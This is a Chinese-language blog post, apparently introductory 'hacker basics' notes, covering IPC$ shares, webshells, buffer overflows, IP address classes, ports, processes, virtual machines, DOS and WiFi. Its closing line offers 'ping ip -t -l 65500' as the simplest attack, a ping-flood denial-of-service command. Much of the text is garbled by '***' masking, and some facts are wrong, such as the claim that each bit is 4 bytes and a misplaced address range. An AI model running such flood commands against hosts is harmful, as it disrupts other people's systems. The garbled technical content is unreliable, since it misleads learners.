　　共享“命名管道”资源，即为了让进程之间通信而开放的命名管道，可以通过验证用户名和密码获着相应权限，在远程管理计算机和查看计算机的共享资源时使用。通过提供可信任的用户名和口令，连接双方可以建立安全的通道并以此通道进行加密数据的交换，从而实现对远程计算机的访问。 IPC$ 是 NT/2000 的一项新功能，它有一个特点，即在同一时间内，两个 IP 之间只允许建立一个连接。 NT/2000 在提供了 ipc$ 功能的同时，在初次安装系统时还打开了默认共享，即所有的逻辑共享 (c$,d$,e$ …… ) 和系统目录 winnt 或 windows(admin$) 共享。所有的这些，微软的初衷都是为了方便管理员的管理，但在有意无意中，导致了系统安全性的降低。

　　不过要注意一点：建立 IPC$ 连接的操作会在 Event Log 中留下记录，不管你是否登录成功

　　

　　shell 命令执行环境。

　　webshell

　　是以ASP,PHP, *** P或者CGI等网页文件形式存在的一种命令执行环境，即一种网页后门。

　　“web”的含义是显然需要服务器开放web服务，“shell”的含义是取得对服务器某种程度上操作权限。webshell常常被称为入侵者通过网站端口对网站服务器的某种程度上操作的权限。由于webshell其大多是以动态脚本的形式出现，也有人称之为网站的后门工具。

　　溢出：大致分为两种，1.堆溢出2.栈溢出。

　　溢出即是缓冲区溢出，即程序对接收的输入数据没有执行有效的检测而导致错误。后是程序崩溃，或者执行攻击者的任务。

　　缓冲区溢出漏洞主要是由于许多软件没有对缓冲区进行检查而造成。

　　具体溢出就看看下面链接吧。

　　

　　1.ip：互联网中，利用IP地址，可以找到目标主机。想要攻击某互联网主机，就先确定目标主机的域名或者IP地址。

　　IP即是主机编址方式，每个IP地址长32bit，每一个bit是4个字节。IP的表示 *** 是'点分十进制表示法'

　　ip信息包括 IP地址，子网掩码，默认网关和DNS。此4个只有协同合作，用户便可以访问互联网并被互联网中的计算机所访问（采用静态IP地址接入互联网时，ISP（服务商）为用户提供全部的IP信息）。

　　企业 *** 使用的IP地址，由提供互联网的服务商ISP分配。

　　私有的IP地址则由 *** 管理员自由分配。但是是 *** 内部所有计算机的IP地址不能相同，否则。发生IP地址冲突，导致 *** 连接失败。

　　子网掩码是与IP地址相结合的使用的一种技术，作用有两种，1.确定地址的 *** 号和主机号。2.用于将一个大的IP *** 划分为若干个小子 *** 。

　　默认网关：是指一台主机找到可用的网关，就把数据包发送给默认指定的网关。由一个网关向另一个网关发送信息时，也必须经过一道关口，这道关口就是网关。

　　DNS：DNS服务用于将用户的域名请求转换为IP地址。若企业 *** 没有提供DNS服务，则DNS服务器的IP地址应是ISP的DNS服务器。如果企业 *** 自己提供的dns服务，则dns服务器的IP地址就是内部DNS服务器的IP地址.

　　IP 地址的分类

　　互联网中的每个接口都有唯一的IP地址与其对应，该地址也是有一定结构。以下是IP的

　　A类的IP地址由一个字节的 *** 地址和3个字节的主机地址组成。 *** 地址的更高位必须是0，可用A类 *** 有126个，每个 *** 能容纳1亿多个主机地址范围1.0.0.1~126.255.255.254.

　　B类IP地址：2个字节的 *** 地址和两个字节的主机地址组成， *** 地址的更高位必须是10，可用的 *** 有16382个，每个 *** 能容纳6万多个主机，地址范围有128.0.0.1~191.255.255.254.

　　C类的IP地址：由3个字节的 *** 地址和1个字节的主机地址。组成 *** 地址更高位是110，可用的 *** 达209万，每个 *** 能容纳254个主机，地址范围是192.0.0.1~223.255.255.254

　　D类的地址

　　用于多点广播，之一个字节以1110开始，它是一个专门保留的地址，并不指向特定的 *** 。多点广播地址用来一次寻址一组计算机，他标识共享同一协议的一组计算机，地址范围为224.0.0.1~239.255.255.254

　　E类的IP地址

　　以11110开始，为了将来使用而保留。

　　全零（0.0.0.0）地址对应于当前主机；全1的IP地址（255.255.255.255）是当前子网的广播地址，地址范围为240.0.0.1~255.255.255.254

　　注意 全零和全1的地址禁止使用，全零代表本 *** ，而全一是广播地址（在CISCO上可以使用全零地址）常用的是ABC这三类地址。

　　2.认识进程

　　所谓进程便是程序在计算机上的一次执行活动。开始运行一个程序时，就启动一个进程。进程还分为系统进程和用户进程。

　　凡是用于完成操作系统的各种功能的进程就是系统进程，且时处于运动状态下的操作系统本身；

　　用户进程就是所有用户启动的进程。进程是操作系统进行资源分配的单位。

　　3.端口

　　是计算机和外界通信交流的出口。

　　硬件领域的端口又称为接口，如USB端口，串行端口等。

　　软件领域端口一般指互联网中面向连接服务和无连接服务的通信协议端口，是一种抽象的软件结构，包括一些数据结构和i/o（基本输入输出）缓冲区。

　　4.虚拟机环境

　　黑客无论是在测试和学习黑客工具的操作 *** 还是在攻击时候，不会拿实体计算机来尝试，而是在计算机中搭建虚拟环境，即在自己已在的系统中，利用虚拟机创建一个内在的系统，该系统可以与外界独立，但与已经存在的系统建立 *** 关系，从而方便使用某些黑客工具进行攻击模拟，并且一旦黑客工具对虚拟机造成破坏，也会很快就会恢复，不会影响本来的计算机系统，使得操作更安全。

　　二：

　　1.window系统的命令行

　　服务器管理 和 *** 管理是系统和 *** 管理者的主要内容。

　　window系统本身 就带着一些病毒和受残损的文件，常使用户无法正常工作。但是熟练掌握命令行的使用 *** ，能保障计算机系统的安全性能。

　　2.Dos系统

　　dos是一组控制计算机 工作的程序，专门用来管理计算机中各种软件，硬件资源，负责监视和 控制计算机的全部工作过程。向用户提供了一整套使用 计算机系统的 命令和 *** ，还向用户提供了一套组织和应用磁盘上信息的 *** 。

　　dos的 功能：

　　执行命令和程序:当用户键入合法命令和文件名后，dos就根据文件的存储地址到内存 或外存上查找用户所需的程序，并根据用户的 要求使得CPU运行，否则则出现出错信息 ，告诉用户服务，在这里，cpu承担了使用者，计算机，应用程序三者之间的中间人。

　　内存管理：

　　分配内存空间，保护内存，使得任何一个程序所占的空间不遭到破坏，同硬件相配合，可以设置一个更佳的操作环境。

　　设备管理：

　　为用户提供使用各种输入或输出的设备（如键盘，磁盘，打印机，和显示器等）的操作 *** 。可以通过dos方便的实现内存和外存之间的数据传送和存取。

　　文件管理;

　　为用户提供一种简单的存取和管理信息 *** 。通过dos管理文件目录，为文件分配磁盘存储空间，建立，复制，删除，读/写和检索各类文件等。

　　作业管理：

　　作业是指用户提交给计算机系统的一个独立的计算任务，包括源程序，数据和相关命令。作业管理是对用户提交的诸多作业进行管理，包括作业的组织，控制和 调度等。

　　文件与目录：

　　文件是存储于外存储器中具有名字的一组相关信息 *** ，

　　在dos下的所有程序和数据都是以文件形式存入磁盘。自己编制的存入磁盘的程序就是文件。执行dos 外部的命令就调用此命令文件的过程。

　　内部命令隐藏在dos的io.sys和msdos.sys中，当dos启动计算机时候

　　使用者输入一个dos 命令时候，该指令先交由command.com分析，所以command被称为命令处理器，其功能就是判断使用者 所输入的指令是内部命令还是外部命令。若是内部，交给io.sys或msdos.sys处理，反之则到磁盘上找寻该档案，即执行该指令。

　　WiFi

　　WiFi实际上是一种高频无线电信号，它是 一种可将个人计算机。手机等终端以无线方式互相连接的技术。

　　无线 *** 在无线局域网上的范畴内是指“无线相容性认证".实质上是一种商业认证。也是无线联网技术。

　　以前通过网线连接计算机，而无线保真则是通过无线电波来联网。常见的就是用一个无线路由器，在这个无线路由器的电波覆盖的有效范围内就可以采用无线保真方式进行联网，若无线路由器连接了一条ADSL的线路或者别的上网线路，

　　电脑的无线路由器的参数设置。192.168.1.1

　　连接问题：手机连不上路由器，可能是手机连接该无线路由器的无线信号，并且在手机上保存了无线 *** 的配置文件，但是改变了无线路由器的加密方式或者密钥。手机不能自动连接到该信号，需要先删除原有的无线配置文件再重新连接。

　　若是手机无线显示已连接，但是不能上网，可能是手机的IP地址等参数配置错误。推荐使用默认的自动获取默认的IP地址。

　　作者：笑雅雅

　　链接：

　　著作权归作者所有。商业转载请联系作者获得授权，非商业转载请注明出处。

　　最简单的 ping ip -t -l 65500